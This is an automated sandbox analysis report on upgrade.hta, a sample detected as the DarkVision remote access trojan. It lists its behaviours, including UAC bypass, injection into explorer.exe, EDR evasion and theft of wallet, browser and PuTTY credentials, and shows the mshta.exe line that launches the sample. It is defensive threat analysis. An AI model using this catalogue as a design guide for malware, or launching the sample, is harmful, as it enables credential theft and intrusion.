Windows
Analysis Report
upgrade.hta
Overview
General Information
Detection
DarkVision Rat
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7156 cmdline: mshta.exe "C:\Users\user\Desktop\upgrade.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 6532 cmdline: